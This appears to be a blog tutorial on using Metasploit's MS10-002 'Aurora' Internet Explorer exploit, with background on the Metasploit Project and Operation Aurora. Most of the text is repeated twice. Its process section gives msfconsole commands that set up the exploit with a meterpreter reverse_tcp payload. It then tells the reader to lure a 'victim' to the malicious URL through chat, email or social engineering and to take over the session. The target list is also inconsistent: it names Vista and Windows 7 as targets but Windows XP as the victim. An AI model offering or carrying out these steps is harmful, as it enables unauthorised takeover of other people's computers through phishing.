What is Metasploit?
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source[2] Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.
The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.
MS10_002 Aurora Exploit:
Operation Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack.
The attack has been aimed at dozens of other organizations, of whichAdobe Systems, Juniper NetworksandRackspacehave publicly confirmed that they were targeted. According to media reports,Yahoo,Symantec, Northrop Grumman, MorganStanley and DowChemicalwere also among the targets.
Exploit Targets:
Requirement:
Process:
You Now have access to the victims Computer. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source[2] Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.
The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.
MS10_002 Aurora Exploit:
Operation Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack.
The attack has been aimed at dozens of other organizations, of whichAdobe Systems, Juniper NetworksandRackspacehave publicly confirmed that they were targeted. According to media reports,Yahoo,Symantec, Northrop Grumman, MorganStanley and DowChemicalwere also among the targets.
Exploit Targets:
- Web Browser: Internet Explorer 5, Internet Explorer 6, Internet Explorer 7, Internet Explorer 8
- Operating System: Windows vista, windows 7, windows server 2008
Requirement:
- Attacker: Metasploit
- Victim PC: Windows XP
Process:
- Open terminal
- Type msfconsole
- Use exploit/windows/browser/ms10_002_aurora
- Msf exploit(ms10_002_aurora)>set payload windows/meterpreter/reverse_tcp
- Msf exploit (ms10_002_aurora)>set lhost 192.168.1.4(IP of Local Host)
- Msf exploit (ms10_002_aurora)>set srvhost 192.168.1.4(This must be an address on the local machine)
- Msf exploit (ms10_002_aurora)>set uripathmeeting(The Url to use for this exploit)
- Msf exploit (ms10_002_aurora)>exploit
- Now an URL you should give to your victim http://192.168.1.4/meeting
- Send the link of the server to the victim via chat or email or any social engineering technique.
You Now have access to the victims Computer. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
Sign up here with your email
ConversionConversion EmoticonEmoticon